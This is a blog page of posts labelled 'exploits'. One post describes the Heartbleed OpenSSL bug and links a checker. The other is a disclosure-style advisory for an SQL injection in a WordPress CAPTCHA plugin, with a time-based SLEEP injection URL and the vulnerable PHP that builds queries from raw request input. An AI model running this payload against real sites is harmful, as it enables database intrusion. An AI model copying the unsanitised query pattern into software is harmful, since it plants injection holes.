Showing posts with label exploits. Show all posts
Showing posts with label exploits. Show all posts

Apr 11, 2014

Test your server for Heartbleed Vulnerability

Heartbleed Bug

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
Test your server for heartbleed vulnerability. F
ilippo.io has a awesome tool for this purpose. Just enter your website and discover if you are vulnerable to this dangerous threat. 

Go Here - http://filippo.io/Heartbleed/


Read more about HeartBleed
 - 
http://heartbleed.com/

Aug 28, 2011

WordPress Super CAPTCHA plugin 2.2.4 SQL Injection Vulnerability





#Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability
# Date: 2011-08-26
#software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip

# Version: 2.2.4 (tested)
# Notes: user has to be logged in as "admin" and magic_quotes has to be turned off


---
PoC
---
http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20


---------------
Vulnerable code
---------------
if(isset($_REQUEST['markspam']))
    {
    global $wpdb;
    $UIDs = explode(',', $_REQUEST['markspam']);
    echo('<h2>Accounts Flagged</h2>');
    for($i=0;$i<count($UIDs);$i++)
        {
        mysql_query("UPDATE `". $wpdb->users ."` SET `spam`='1' WHERE `ID`='". $UIDs[$i] ."'");
        mysql_query("UPDATE `". $wpdb->users ."` SET `user_status`='1' WHERE `ID`='". $UIDs[$i] ."'");
        echo('<em>USER ID: '. $UIDs[$i] .' marked as spammer.</em><br />');
        }
}



Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More